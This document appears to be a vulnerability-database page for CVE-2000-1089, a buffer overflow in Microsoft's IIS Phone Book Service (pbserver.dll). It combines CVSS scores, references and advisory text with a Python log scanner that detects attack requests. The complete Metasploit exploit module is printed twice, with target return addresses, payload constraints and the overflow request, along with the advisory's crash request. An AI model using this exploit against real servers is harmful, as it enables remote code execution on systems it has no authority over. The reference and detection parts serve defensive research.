CVE-2000-1089
CVSS10.0
Published: 2001-01-09 00:00:00
Revised: 2008-09-05 16:22:37

[Original] Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability.


[CNNVD] Microsoft Phone Book Service buffer overflow vulnerability (CNNVD-200101-026)

Microsoft Phone Book Service has a buffer overflow vulnerability. Local users can exploit it to execute arbitrary commands; it is also known as the "Phone Book Service Buffer Overflow" vulnerability.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0  Microsoft Windows NT 4.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1089
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1089
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-026
(official data source) CNNVD

- Other links and resources

http://www.stake.com/research/advisories/2000/a120400-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A120400-1
http://www.securityfocus.com/bid/2048
(VENDOR_ADVISORY)  BID  2048
http://www.microsoft.com/technet/security/bulletin/MS00-094.asp
(VENDOR_ADVISORY)  MS  MS00-094
http://xforce.iss.net/xforce/xfdb/5623
(UNKNOWN)  XF  phone-book-service-bo(5623)

- Vulnerability information

Microsoft Phone Book Service buffer overflow vulnerability
Critical / Buffer overflow
2001-01-09 00:00:00 2005-10-12 00:00:00
Remote
Microsoft Phone Book Service has a buffer overflow vulnerability. Local users can exploit it to execute arbitrary commands; it is also known as the "Phone Book Service Buffer Overflow" vulnerability.

- Advisories and patches


- Vulnerability information (16357)

Microsoft IIS Phone Book Service Overflow (EDBID:16357)
windows remote
2010-04-30 Verified
0 metasploit
N/A [Download]
##
# $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS Phone Book Service Overflow',
			'Description'    => %q{
					This is an exploit for the Phone Book Service /pbserver/pbserver.dll
				described in MS00-094. By sending an overly long URL argument
				for phone book updates, it is possible to overwrite the stack. This
				module has only been tested against Windows 2000 SP1.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2000-1089' ],
					[ 'OSVDB', '463' ],
					[ 'BID', '2048' ],
					[ 'MSB', 'MS00-094' ],
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 896,
					'BadChars' => "\x00\x0a\x0d\x20%&=?",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
					['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
					['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
				],
			'DisclosureDate' => 'Dec 04 2000',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
			], self.class)
	end

	def check
		print_status("Requesting the vulnerable ISAPI path...")
		res = send_request_raw({
			'uri' => datastore['URL']
		}, 5)

		if (res and res.code == 400)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		print_status("Sending overflow...")

		res = send_request_raw({
			'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
		}, 5)

		handler

	end

end
		

- Vulnerability information (20460)

Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow (EDBID:20460)
windows remote
2000-12-04 Verified
0 Alberto Solino
N/A [Download]
source: http://www.securityfocus.com/bid/2048/info

The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default.

A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with the privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5).

The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/

According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format:

http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pbver=&pb=<STRING=db name>

The DLL checks the total length to ensure that the request does not exceed 1024 bytes; however, it is possible to overflow a local variable of fixed length in the DLL by sending a request of the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n

The result is an exception reported in the Event log with source WAM like the following:

The HTTP server encountered an unhandled exception while processing the ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B

For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.

By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.
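A defender-side check for this issue, added here as an example and not part of the advisory or of the Metasploit module: it scans IIS W3C log rows for the pbserver.dll request shapes described above (an oversized pb= value, the empty-separator form of the crash request, and the bare probe whose 400 response the module's check() relies on). The log rows, the field list and the 128-byte threshold are constructed assumptions.

```python
from urllib.parse import parse_qsl
# Assumed threshold (not from the advisory): a real phone-book name is short. The advisory
# says the DLL rejects only requests over 1024 bytes while a pb= value under 980 bytes
# already overruns the local buffer, so the alert threshold must sit far below that.
PB_VALUE_LIMIT = 128
VULN_PATH = "/pbserver/pbserver.dll"

def analyze_request(uri_stem, uri_query, status):
    """Findings for one IIS request row; an empty list means nothing suspicious."""
    findings = []
    if uri_stem.lower() != VULN_PATH:
        return findings
    query = "" if uri_query == "-" else uri_query  # W3C logs write '-' for no query
    params = dict(parse_qsl(query, keep_blank_values=True))
    pb_len = len(params.get("pb", ""))
    # The documented request carries osarch..pbver before pb; the crash request in the
    # advisory replaces them with empty '&' separators, which parse_qsl silently drops.
    empty_segments = sum(1 for seg in query.split("&") if seg == "")
    if pb_len > PB_VALUE_LIMIT:
        findings.append(f"pb value is {pb_len} bytes (limit {PB_VALUE_LIMIT})")
    if "pb" in params and empty_segments >= 4:
        findings.append("pb= preceded by empty separators instead of the documented parameters")
    if not query and status == "400":
        findings.append("bare request to the ISAPI path answered 400 (presence probe)")
    return findings

def parse_w3c(log_text):
    """Yield one dict per row of an IIS W3C extended log, keyed by its #Fields header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif not line.startswith("#") and line.strip() and fields:
            yield dict(zip(fields, line.split()))

def scan_log(log_text):
    """Return (client ip, status, findings) for every suspicious pbserver request."""
    alerts = []
    for row in parse_w3c(log_text):
        found = analyze_request(row["cs-uri-stem"], row.get("cs-uri-query", "-"), row.get("sc-status", "-"))
        if found:
            alerts.append((row.get("c-ip"), row.get("sc-status"), found))
    return alerts

# Constructed sample log: a legitimate update, a bare probe and a crash-shaped request.
SAMPLE_LOG = (
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    "2000-12-04 10:00:01 10.0.0.5 GET /pbserver/pbserver.dll "
    "osarch=9&ostype=2&osver=5&cmver=1&lcid=1033&pbver=1&pb=corp 200\n"
    "2000-12-04 10:00:09 10.0.0.9 GET /pbserver/pbserver.dll - 400\n"
    "2000-12-04 10:00:12 10.0.0.9 GET /pbserver/pbserver.dll &&&&&&pb=" + "A" * 900 + " 500\n"
)
```

Running scan_log(SAMPLE_LOG) reports the probe row once and the crash-shaped row twice (oversized pb= and empty separators); the legitimate update row produces nothing.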

- Vulnerability information (F83175)

Microsoft IIS Phone Book Service Overflow (PacketStormID:F83175)
2009-11-26 00:00:00
patrick  metasploit.com
exploit
windows,2k
CVE-2000-1089
[Download]

This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This Metasploit module has only been tested against Windows 2000 SP1.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS Phone Book Service Overflow',
			'Description'    => %q{
				This is an exploit for the Phone Book Service /pbserver/pbserver.dll
				described in MS00-094. By sending an overly long URL argument
				for phone book updates, it is possible to overwrite the stack. This
				module has only been tested against Windows 2000 SP1.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2000-1089' ],
					[ 'OSVDB', '463' ],
					[ 'BID', '2048' ],
					[ 'MSB', 'MS00-094' ],
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 896,
					'BadChars' => "\x00\x0a\x0d\x20%&=?",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
					['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
					['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
				],
			'DisclosureDate' => 'Dec 04 2000',
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('URL', [ true,  "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
				], self.class)					
	end

	def check
		print_status("Requesting the vulnerable ISAPI path...")
		res = send_request_raw({
			'uri' => datastore['URL']
		}, 5)		

		if (res and res.code == 400)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		print_status("Sending overflow...")

		res = send_request_raw({
			'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
		}, 5)

		handler

	end

end
    

- Vulnerability information

OSVDB ID: 463
Microsoft IIS Phone Book Service /pbserver/pbserver.dll Remote Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity, Patch / RCS
Exploit Unknown, Vendor Verified

- Vulnerability description

A remote overflow exists in Microsoft IIS Phone Book Service. The service fails to properly handle URL processing resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2000-12-04 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

